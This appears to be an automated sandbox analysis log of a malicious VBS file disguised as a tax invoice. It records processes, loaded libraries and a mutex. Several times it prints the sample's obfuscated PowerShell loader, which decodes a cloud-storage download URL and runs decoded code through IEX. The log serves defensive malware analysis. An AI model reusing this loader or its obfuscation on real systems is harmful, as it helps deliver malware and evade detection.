              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-WDQFG0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k5dhknl5.0j1.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1788
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1812
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
              Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: comsvcs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmlua.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
